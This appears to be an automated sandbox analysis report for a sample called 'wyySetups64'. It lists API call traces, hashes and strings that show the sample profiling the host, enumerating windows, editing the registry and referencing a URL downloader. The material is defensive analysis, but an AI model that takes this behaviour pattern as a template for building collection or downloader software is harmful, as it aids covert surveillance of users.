                                                                                                                                                                                                              • Instruction ID: 4d9198b2984e5e082309ff7aa8a3130d82e8df6aeec633f907ab193b7f9989e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c848dbf772fb136aa0b1a4503c2d55199b9e41e15513577ea7fb89fc6818d4e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79313EB4D00259DFDB04DFA4C895BEEBBB4FF48350F208619E915A3395DB34AA40CBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 10010BFD
                                                                                                                                                                                                                • Part of subcall function 100114A3: InitializeSListHead.KERNEL32(10017318,10010C07,10014EC8,00000010,10010B98,?,?,?,10010DBE,?,00000001,?,?,00000001,?,10014F10), ref: 100114A8
                                                                                                                                                                                                              • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(10012320,10012324,10014EC8,00000010,10010B98,?,?,?,10010DBE,?,00000001,?,?,00000001,?,10014F10), ref: 10010C16
                                                                                                                                                                                                              • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(10012300,1001231C,10014EC8,00000010,10010B98,?,?,?,10010DBE,?,00000001,?,?,00000001,?,10014F10), ref: 10010C34
                                                                                                                                                                                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 10010C67
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 590286634-0
                                                                                                                                                                                                              • Opcode ID: 5bd69a3745def1f0a502212b4dd3d1811da621de82d7f1043a7733e41357daf7
                                                                                                                                                                                                              • Instruction ID: 39f7e9c7f58ab3c24a5f1c768587727ae30ebfb406468ad2b612d2fa9f71a151
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5bd69a3745def1f0a502212b4dd3d1811da621de82d7f1043a7733e41357daf7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D421027A7482129AEB18EBB898027CC37A1EF11364F108205F4C96F1C3DBF1E5C18A96
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2AD
                                                                                                                                                                                                              • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2BA
                                                                                                                                                                                                              • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2C5
                                                                                                                                                                                                              • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2D2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2950233615-0
                                                                                                                                                                                                              • Opcode ID: 1783d4faa295622926a9acba5ea9b70e108ed3dee63503e54d904724665c109e
                                                                                                                                                                                                              • Instruction ID: 286a1d44accefb07714ea732755267c184901f6fbadf7b8dc8f0254af49e132d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1783d4faa295622926a9acba5ea9b70e108ed3dee63503e54d904724665c109e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5110D74E00219EFDB14DFA4D9958AEB7F5FF48240B204199E805A7355EB30AF01EB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,1000B486), ref: 1000C0CA
                                                                                                                                                                                                              • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,1000B486), ref: 1000C0DD
                                                                                                                                                                                                              • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,1000B486), ref: 1000C0EC
                                                                                                                                                                                                              • ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(1000B44A,1000B44A,1000B449,?,1000B486), ref: 1000C110
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@$?egptr@?$basic_streambuf@?setg@?$basic_streambuf@D00@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3089488326-0
                                                                                                                                                                                                              • Opcode ID: 9fea32db6d82a8732664cb0fa318f11d1207675337fcaee34ad8ebc0f3171566
                                                                                                                                                                                                              • Instruction ID: e6559f61c40ac0d619c819a68eafb266e25295ce9371c656e40cb26db6e47210
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9fea32db6d82a8732664cb0fa318f11d1207675337fcaee34ad8ebc0f3171566
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5F0FF70900108EFCB08DF98CE9599DB7B6FF48301B20819EE406A3352CB31AF50EB54
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00D605F4
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000), ref: 00D605FB
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,100048C0,00000000,00000000,00000000), ref: 00D60610
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,100100C0,00000000,00000000,00000000), ref: 00D60625
                                                                                                                                                                                                                • Part of subcall function 00D51147: LoadLibraryW.KERNEL32(10012398), ref: 00D51152
                                                                                                                                                                                                                • Part of subcall function 00D51147: GetProcAddress.KERNEL32(?,100123AC), ref: 00D51164
                                                                                                                                                                                                                • Part of subcall function 00D51147: GetProcAddress.KERNEL32(?,100123C0), ref: 00D51178
                                                                                                                                                                                                                • Part of subcall function 00D51147: GetModuleHandleA.KERNEL32(00000000), ref: 00D511D4
                                                                                                                                                                                                                • Part of subcall function 00D51147: RegisterClassW.USER32(?), ref: 00D511E8
                                                                                                                                                                                                                • Part of subcall function 00D51147: CreateWindowExW.USER32(00000000,100123D8,100123EC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00D5120D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateThread$AddressProc$ClassCurrentHandleLibraryLoadModuleObjectRegisterSingleWaitWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 487361192-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 00D613D2
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00D613E1
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00D613EA
                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00D613F7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2933794660-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100046D3
                                                                                                                                                                                                              • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 100047D2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Concurrency::task_continuation_context::task_continuation_contextFileModuleName
                                                                                                                                                                                                              • String ID: .exe
                                                                                                                                                                                                              • API String ID: 2188046178-4119554291
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(100172D4,?,URLDownloader,?,1000177C,100176B8,?,?,?,?,100019DB,10017674,00C40000,80000000,80000000,00000190), ref: 1001077C
                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(100172D4,?,1000177C,100176B8,?,?,?,?,100019DB,10017674,00C40000,80000000,80000000,00000190,00000078,00000000), ref: 100107B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                                                              • String ID: URLDownloader
                                                                                                                                                                                                              • API String ID: 17069307-1891997712

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:5.3%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                              Signature Coverage:3.2%
                                                                                                                                                                                                              Total number of Nodes:629
                                                                                                                                                                                                              Total number of Limit Nodes:20
43867->43869 43885 3388262 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 43868->43885 43873 33810fc 43869->43873 43872 3381210 43872->43865 43874 3381108 ___BuildCatchObjectHelper 43873->43874 43879 3381155 43874->43879 43883 33811a5 ___BuildCatchObjectHelper 43874->43883 43886 3380f98 43874->43886 43878 3381185 43881 3380f98 __CRT_INIT@12 149 API calls 43878->43881 43878->43883 43879->43883 43938 337e480 43879->43938 43880 337e480 ___DllMainCRTStartup 521 API calls 43882 338117c 43880->43882 43881->43883 43884 3380f98 __CRT_INIT@12 149 API calls 43882->43884 43883->43872 43884->43878 43885->43869 43887 3380fa4 ___BuildCatchObjectHelper 43886->43887 43888 3380fac 43887->43888 43889 3381026 43887->43889 43942 3381a1b HeapCreate 43888->43942 43891 3381087 43889->43891 43897 338102c 43889->43897 43892 338108c 43891->43892 43898 33810e5 43891->43898 43957 3383ca0 TlsGetValue 43892->43957 43893 3380fb1 43895 3380fbc 43893->43895 43904 3380fb5 ___BuildCatchObjectHelper 43893->43904 43943 3384014 86 API calls 4 library calls 43895->43943 43896 338104a 43903 338105e 43896->43903 43953 3387dfb 67 API calls _free 43896->43953 43897->43896 43897->43904 43952 3381ce6 66 API calls _doexit 43897->43952 43898->43904 43985 3383fa6 79 API calls __freefls@4 43898->43985 43956 3381071 70 API calls __mtterm 43903->43956 43904->43879 43906 3380fc1 __RTC_Initialize 43910 3380fc5 43906->43910 43917 3380fd1 GetCommandLineA 43906->43917 43944 3381a39 HeapDestroy 43910->43944 43911 3381054 43954 3383cf1 70 API calls _free 43911->43954 43912 33810a9 DecodePointer 43918 33810be 43912->43918 43915 3380fca 43915->43904 43916 3381059 43955 3381a39 HeapDestroy 43916->43955 43945 338817f 71 API calls 2 library calls 43917->43945 43921 33810d9 43918->43921 43922 33810c2 43918->43922 43979 337f639 43921->43979 43966 3383d2e 43922->43966 43923 3380fe1 43946 3387bb6 73 API calls __calloc_crt 43923->43946 43927 33810c9 GetCurrentThreadId 
43927->43904 43928 3380feb 43929 3380fef 43928->43929 43948 33880c4 95 API calls 3 library calls 43928->43948 43947 3383cf1 70 API calls _free 43929->43947 43932 3380ffb 43933 338100f 43932->43933 43949 3387e4e 94 API calls 6 library calls 43932->43949 43933->43915 43951 3387dfb 67 API calls _free 43933->43951 43936 3381004 43936->43933 43950 3381af9 77 API calls 4 library calls 43936->43950 43939 337e4af 43938->43939 43940 337e489 43938->43940 43939->43878 43939->43880 43940->43939 43941 337e491 CreateThread WaitForSingleObject 43940->43941 43941->43939 43986 337df10 43941->43986 43942->43893 43943->43906 43944->43915 43945->43923 43946->43928 43947->43910 43948->43932 43949->43936 43950->43933 43951->43929 43952->43896 43953->43911 43954->43916 43955->43903 43956->43904 43958 3381091 43957->43958 43959 3383cb5 DecodePointer TlsSetValue 43957->43959 43960 3384534 43958->43960 43959->43958 43963 338453d 43960->43963 43961 338a6f2 __calloc_crt 65 API calls 43961->43963 43962 338109d 43962->43904 43962->43912 43963->43961 43963->43962 43964 338455b Sleep 43963->43964 43965 3384570 43964->43965 43965->43962 43965->43963 43967 3384300 ___BuildCatchObjectHelper 43966->43967 43968 3383d3a GetModuleHandleW 43967->43968 43969 3388e5b __lock 64 API calls 43968->43969 43970 3383d78 InterlockedIncrement 43969->43970 43971 3383dd0 __CRT_INIT@12 LeaveCriticalSection 43970->43971 43972 3383d92 43971->43972 43973 3388e5b __lock 64 API calls 43972->43973 43974 3383d99 43973->43974 43975 3384d46 ___addlocaleref 8 API calls 43974->43975 43976 3383db7 43975->43976 43977 3383dd9 __CRT_INIT@12 LeaveCriticalSection 43976->43977 43978 3383dc4 ___BuildCatchObjectHelper 43977->43978 43978->43927 43980 337f644 RtlFreeHeap 43979->43980 43981 337f66d __dosmaperr 43979->43981 43980->43981 43982 337f659 43980->43982 43981->43904 43983 337f91b _write_string 64 API calls 43982->43983 43984 337f65f GetLastError 43983->43984 43984->43981 43985->43904 43987 3380542 67 API calls 43986->43987 43988 
337df5a Sleep 43987->43988 43989 337df97 43988->43989 43990 337df74 43988->43990 43992 337dfa4 GetLocalTime wsprintfW SetUnhandledExceptionFilter 43989->43992 43993 337df9f 43989->43993 43991 337f707 77 API calls 43990->43991 43994 337df7b 43991->43994 43996 337fa29 284 API calls 43992->43996 43995 3377620 14 API calls 43993->43995 43997 337fa29 284 API calls 43994->43997 43995->43992 43998 337e003 CloseHandle 43996->43998 43999 337df8d CloseHandle 43997->43999 44000 337f707 77 API calls 43998->44000 43999->43989 44001 337e014 44000->44001 44002 337e022 44001->44002 44003 3372c90 8 API calls 44001->44003 44004 337f707 77 API calls 44002->44004 44003->44002 44005 337e036 44004->44005 44006 3379730 80 API calls 44005->44006 44010 337e04e 44005->44010 44006->44010 44007 337f876 66 API calls __NMSG_WRITE 44007->44010 44008 337e189 EnumWindows 44009 337e1a5 Sleep EnumWindows 44008->44009 44008->44010 44009->44009 44009->44010 44010->44007 44010->44008 44011 337e1f0 Sleep 44010->44011 44012 3380542 67 API calls 44010->44012 44013 337e239 CreateEventA 44010->44013 44029 3372da0 301 API calls 44010->44029 44011->44010 44012->44010 44014 337f876 __NMSG_WRITE 66 API calls 44013->44014 44019 337e281 44014->44019 44015 337ca70 113 API calls 44015->44019 44016 337e2bf Sleep RegOpenKeyExW 44017 337e2f5 RegQueryValueExW 44016->44017 44016->44019 44017->44019 44018 3375430 268 API calls 44018->44019 44019->44015 44019->44016 44019->44018 44023 337e339 44019->44023 44020 337e345 CloseHandle 44020->44010 44021 337fa29 284 API calls 44021->44023 44022 337e39f Sleep 44022->44023 44023->44020 44023->44021 44023->44022 44024 337e422 WaitForSingleObject CloseHandle 44023->44024 44025 3380542 67 API calls 44023->44025 44027 337e3dd Sleep CloseHandle 44023->44027 44028 337e3cd WaitForSingleObject CloseHandle 44023->44028 44024->44023 44026 337e43c Sleep CloseHandle 44025->44026 44026->44010 44027->44010 44028->44027 44029->44010 44031 bd3366 44030->44031 44032 bd1100 70 API calls 
44031->44032 44037 bd3378 _memmove 44032->44037 44033 bd34e1 44033->43803 44034 bd34c6 44035 bd11b0 70 API calls 44034->44035 44036 bd34d8 44035->44036 44036->43803 44037->44033 44037->44034 44038 bd3403 timeGetTime 44037->44038 44040 bd11b0 70 API calls 44037->44040 44042 bd54c0 44037->44042 44039 bd11b0 70 API calls 44038->44039 44039->44037 44040->44037 44043 bd54dc 44042->44043 44044 bd580d 44042->44044 44045 bd5707 VirtualAlloc 44043->44045 44046 bd54e7 RegOpenKeyExW 44043->44046 44044->44037 44048 bd5745 44045->44048 44047 bd5515 RegQueryValueExW 44046->44047 44053 bd55ba 44046->44053 44049 bd55ad RegCloseKey 44047->44049 44050 bd553a 44047->44050 44052 bd67ff 77 API calls 44048->44052 44049->44053 44051 bd67ff 77 API calls 44050->44051 44054 bd5540 _memset 44051->44054 44055 bd5758 44052->44055 44056 bd55f5 44053->44056 44068 bd56f8 44053->44068 44059 bd554d RegQueryValueExW 44054->44059 44063 bd5788 RegCreateKeyW 44055->44063 44055->44068 44057 bd55fe VirtualFree 44056->44057 44058 bd5611 _memset 44056->44058 44057->44058 44069 bd67ff 77 API calls 44058->44069 44061 bd5569 VirtualAlloc 44059->44061 44062 bd55aa 44059->44062 44060 bd721b 738 API calls 44066 bd57f3 Sleep 44060->44066 44067 bd55a5 44061->44067 44062->44049 44064 bd57ca RegCloseKey 44063->44064 44065 bd57a3 RegDeleteValueW RegSetValueExW 44063->44065 44064->44068 44065->44064 44074 bd2d10 44066->44074 44067->44062 44068->44060 44071 bd56b1 44069->44071 44070 bd56e6 ctype 44070->44037 44071->44070 44072 bd60df 71 API calls 44071->44072 44072->44070 44075 bd2d21 setsockopt CancelIo InterlockedExchange closesocket SetEvent 44074->44075 44076 bd2d70 44074->44076 44075->44076 44076->44044 44077->43827 44078 bd32e0 6 API calls 44079 bd3200 Sleep 44080 bf0254 44079->44080 44081 bd6013 44082 bd6045 44081->44082 44083 bf0003 44082->44083 44086 bd608a 44082->44086 44089 bd5e07 44082->44089 44087 bd60a0 RegOpenKeyExW 44086->44087 44088 bd3f35 __wcsrev 44087->44088 44090 bef0f9 RegQueryValueExW 
44089->44090 44091 bd3f35 __wcsrev 44090->44091 44092 bd5eb2 Sleep 44093 bd6f17 77 API calls 44092->44093 44094 bd5ec9 44093->44094

Control-flow Graph
[Figure: control-flow graph, first block 3375430-33754b7; legend: Executed / Not Executed]
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0337F707: _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337546C
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03375485
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03375495
                                                                                                                                                                                                              • gethostname.WS2_32(?,00000032), ref: 033754A3
                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 033754AD
                                                                                                                                                                                                              • inet_ntoa.WS2_32 ref: 033754C5
                                                                                                                                                                                                              • _strcat_s.LIBCMT ref: 033754D8
                                                                                                                                                                                                              • _strcat_s.LIBCMT ref: 033754F1
                                                                                                                                                                                                              • inet_ntoa.WS2_32 ref: 0337551A
                                                                                                                                                                                                              • _strcat_s.LIBCMT ref: 0337552D
                                                                                                                                                                                                              • _strcat_s.LIBCMT ref: 03375546
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03375573
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03375587
                                                                                                                                                                                                              • GetLastInputInfo.USER32(?), ref: 0337559A
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 033755A0
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 033755D5
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 033755E8
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 033755FC
                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03375653
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337566C
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 03375695
                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 033756AC
                                                                                                                                                                                                              • lstrlenW.KERNEL32(000008CC), ref: 033756D3
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000994), ref: 03375739
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 033757AA
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 033757B1
                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 033757C2
                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 033757CD
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 03375806
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 03375818
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0337582E
                                                                                                                                                                                                              • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 0337584B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(03395164), ref: 0337587F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 033758E9
                                                                                                                                                                                                              • __time64.LIBCMT ref: 033758F8
                                                                                                                                                                                                              • __localtime64.LIBCMT ref: 0337592F
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 03375968
                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 0337597D
                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 0337598C
                                                                                                                                                                                                              • GetCurrentHwProfileW.ADVAPI32(?), ref: 03375999
                                                                                                                                                                                                                • Part of subcall function 033780F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03378132
                                                                                                                                                                                                                • Part of subcall function 033780F0: lstrcmpiW.KERNEL32(?,A:\), ref: 03378166
                                                                                                                                                                                                                • Part of subcall function 033780F0: lstrcmpiW.KERNEL32(?,B:\), ref: 03378176
                                                                                                                                                                                                                • Part of subcall function 033780F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 033781A6
                                                                                                                                                                                                                • Part of subcall function 033780F0: lstrlenW.KERNEL32(?), ref: 033781B7
                                                                                                                                                                                                                • Part of subcall function 033780F0: __wcsnicmp.LIBCMT ref: 033781CE
                                                                                                                                                                                                                • Part of subcall function 033780F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 03378204
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
• Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                                                                                                                                                                                              • String ID: %d min$1.0$2024.12. 3$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 00B204AE
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 00B204DE
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00B204F5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocVirtual$InfoNativeSystem
                                                                                                                                                                                                              • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 03380542: __fassign.LIBCMT ref: 03380538
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 0337DF64
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0337DF91
                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 0337DFA9
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337DFE0
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(033775B0), ref: 0337DFEE
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0337E007
                                                                                                                                                                                                                • Part of subcall function 0337F707: _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                              • EnumWindows.USER32(03375CC0,?), ref: 0337E19D
                                                                                                                                                                                                              • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0337E1AA
                                                                                                                                                                                                              • EnumWindows.USER32(03375CC0,?), ref: 0337E1BE
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 0337E1F5
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0337E241
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0), ref: 0337E2C4
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 0337E2EB
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0337E30B
